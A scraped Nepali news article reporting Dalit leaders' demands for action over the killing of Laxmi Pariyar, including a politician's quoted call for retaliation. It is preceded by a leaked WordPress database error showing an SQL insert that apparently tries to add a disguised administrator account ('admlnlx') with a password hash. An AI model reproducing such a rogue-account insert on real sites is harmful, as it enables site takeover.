WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcYQbG4Y5l.1t5tTFmG8HzHEC7Mil70', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:12:23', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर ३०–
काभ्रेको सानो वाङथली ७ की ३२ वर्षीया लक्ष्मी परियारको हत्यामा संलग्न व्यक्तिलाई कडा कारवाही गर्न दलित अगुवाहरूले माग गरेका छन् ।
बिहीबार रिपार्टर्स क्लब नेपालमा आयोजित पत्रकार सम्मेलनमा पाँच बुँदे माग सार्बजनिक गर्दै उनीहरुले माग सम्बोधन नभए कडा आन्दोलन गर्ने चेतावनी दिए ।
कार्यक्रममा माओवादी केन्द्रका नेता तिलक परियारले दोषिमाथि कडा कारवाही हुनुपर्ने बताए । उनले भने, ‘दलित समुदायका मानिसलाई मार्न पछि नपर्नेलाई मार्न तयार रहनुपर्छ, हेप्न तयार हुनेलाई हेप्न तयार हुनुपर्छ, यहाँ दोषीलाई उन्मुक्ति दिने र निर्दोषलाई फसाउने काम षडयन्त्र भैरहेको छ, अब हामीले यस्ता कुराबाट डराउनु हुँदैन ।’
महिला तथा दलित अधिकारकर्मी सरु सुनारले लक्ष्मी परियारको हत्या नै भएको दाबी गर्दै हत्यामा संलग्नलाई कारबाही गर्न चासो नदिए सशक्त आन्दोलन गर्ने बताइन् ।
परियारको यही मंसिर २० गते हत्या भएको थियो ।